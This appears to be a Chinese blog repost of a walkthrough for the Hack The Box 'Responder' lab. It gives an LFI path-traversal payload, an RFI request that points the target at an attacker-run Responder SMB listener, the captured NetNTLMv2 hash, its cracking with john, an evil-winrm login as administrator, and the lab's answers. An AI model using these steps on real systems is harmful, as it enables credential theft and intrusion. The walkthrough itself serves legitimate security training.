HackTheBox-Responder

admin 2024年2月22日17:54:46评论15 views字数 3035阅读10分7秒阅读模式

初始点1级第四关Responder

获取目标IP。

HackTheBox-Responder

执行以下命令,扫描目标IP。

nmap -p- --min-rate=1000 -sV {target_IP}
-p- 扫描所有端口
--min-rate 指定nmap每秒发送的最小数据包数量,数字越大,速度越快
-sV 探测开放端口以确定服务/版本信息

HackTheBox-Responder

扫描发现80和5985端口开放,5989端口为winrm远程管理协议,如果有远程管理权限的账号密码,即可获取目标机shell。

浏览器访问目标机IP。

http://{target_IP}

HackTheBox-Responder

没有找到,而且url显示跳转到unika.htb,考虑是该IP绑定了多个域名,我们需要在/etc/hosts文件中添加该域名,让浏览器正常解析unika.htb的地址。

vim /etc/hosts

HackTheBox-Responder

查看该网页后没有发现可利用功能,不过导航栏的语言选择功能,点击后url显示page参数=german.html

HackTheBox-Responder

如果页面输入未经过滤,可能存在文件包含漏洞。

LFI本地文件包含,指包含本地文件并且可以执行。

RFI远程文件包含,指包含远程服务器上的文件并且可以执行。

我们测试WindowsSystem32driversetchosts文件(主机名本地转换为IP),windows系统测试LFI较常用。

../一次遍历一层目录,使用多个../遍历到基本目录C:

page=../../../../../../../../../../windows/system32/drivers/etc/hosts

HackTheBox-Responder

响应内容,则可能存在LFI。

在php配置文件php.ini中,allow_url_include设置为off,表示php不会远程加载http或ftp url,防止文件包含漏洞攻击,但不会阻止加载smb url,可以利用此功能获取HTLM哈希。

这里我们使用Responder,它会设置一个恶意的smb服务器,当目标机对服务器进行HTLM验证时,服务器生成Challenge发回客户端,客户端使用用户的密码hash对Challenge加密,当服务器响应时,Responder会使用Challenge加密响应来生成NetNTLMv2。

1、查看responder.conf是否监听smb请求。

Responder.conf ⽂件的位置:

默认系统安装:/usr/share/responder/Responder.conf

github 安装:/installation_directory/Responder.conf

cat responder.conf

HackTheBox-Responder

2、python3启动responder,-i指定网络接口,网络接口可用ifconfig命令查看。

python3 responder.py -I tun0

3、浏览器访问以下地址,IP用我们攻击机的IP。

http://unika.htb/?page=//x.x.x.x/somefile

返回错误。

HackTheBox-Responder

但responder监听时,发现一个用于管理员用户的NetNTLMv。

HackTheBox-Responder

4、我们把哈希值保存下来用john进行破解。

echo Administrator::RESPONDER:ab24604971e51881:4C1A046B103E5384F93217C5B020E0BB:010100000000000000CBC550A565DA014BB09ADED206C7FF00000000020008004D004B003200540001001E00570049004E002D004200590054004900580051004A004A0046004500320004003400570049004E002D004200590054004900580051004A004A004600450032002E004D004B00320054002E004C004F00430041004C00030014004D004B00320054002E004C004F00430041004C00050014004D004B00320054002E004C004F00430041004C000700080000CBC550A565DA0106000400020000000800300030000000000000000100000000200000A79D13C226EFC2523C87C6EAD596B381E9B8657B19F4AB5E7CE2842B266222910A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100390038000000000000000000 > hash.txt
john -w=/usr/share/wordlists/rockyou.txt hash.txt
-w:指定破解哈希值用的字典

HackTheBox-Responder

密码:badminton

连接到目标机WinRM服务,使用evil-winrm。

evil-winrm -i x.x.x.x -u administrator -p badminton

HackTheBox-Responder

连接成功。最后在C:usersmikeDesktop找到flag.txt。

HackTheBox-Responder

type查看flag值。

Responder任务

任务1

问:当使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?

答:unika.htb

任务2

问:服务器上使用哪种脚本语言来生成网页?

答:php

任务3

问:用于加载不同语言版本网页的 URL 参数名称是什么?

答:page

任务4

问:以下哪个“page”参数值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”,“minikatz.exe”

答:../../../../../../../../windows/system32/drivers/etc/hosts

任务5

问:以下哪个“page”参数值是利用远程文件包含 (RFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”,“minikatz.exe”

答://10.10.14.6/somefile

任务6

问:NTLM 代表什么?

答:New Technology LAN Manager

任务7

问:我们在 Responder 实用程序中使用哪个标志来指定网络接口?

答:-I

任务8

问:有多种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看其中是否有任何密码生成相同的响应。此类工具通常被称为“john”,但全名是什么?

答:john the ripper

任务9

问:管理员用户的密码是什么?

答:badminton

任务10

问:我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问 Responder 计算机。它监听哪个端口的 TCP?

答:5985

任务11

提交flag。

总结

当事情不景气时,继续前进、坚持不懈是至关重要的。


原文始发于微信公众号(AlertSec):HackTheBox-Responder

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月22日17:54:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-Responderhttps://cn-sec.com/archives/2516063.html

发表评论

匿名网友 填写信息